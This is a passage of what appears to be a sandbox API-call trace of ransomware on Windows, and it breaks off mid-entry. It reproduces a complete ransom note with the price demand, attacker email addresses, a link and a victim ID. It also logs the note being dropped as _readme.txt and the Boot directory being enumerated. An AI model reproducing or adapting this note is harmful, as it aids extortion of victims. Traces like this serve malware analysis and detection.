\"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.693] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.693] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.693] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0200.693] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x475e1b60, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x475e1b60, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0200.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x4724fa60, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0200.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0200.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0200.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0200.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x32f9228 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0200.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0200.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x32ef238 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0200.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9318 | out: hHeap=0x2c0000) returned 1 [0200.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9228 | out: hHeap=0x2c0000) returned 1 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0200.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0200.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x32e5198 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92c8 [0200.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0200.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9228 | out: hHeap=0x2c0000) returned 1 [0200.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ef238 | out: hHeap=0x2c0000) returned 1 [0200.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0200.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.695] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b98 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.695] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x3b2fd8 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92c8 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4d50 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4e18 [0200.695] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.695] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x32b69d8 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4df0 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4e40 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32feb78 [0200.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32feba0 [0200.696] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0200.696] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0200.696] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x3294350 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92c8 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32febc8 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32febf0 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fec18 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fec40 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fec68 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fec90 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fecb8 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fece0 [0200.696] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0200.696] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.696] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0200.697] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0200.697] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x3310808 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32feba0 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32feb78 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fed08 [0200.697] RtlAllocateHeap 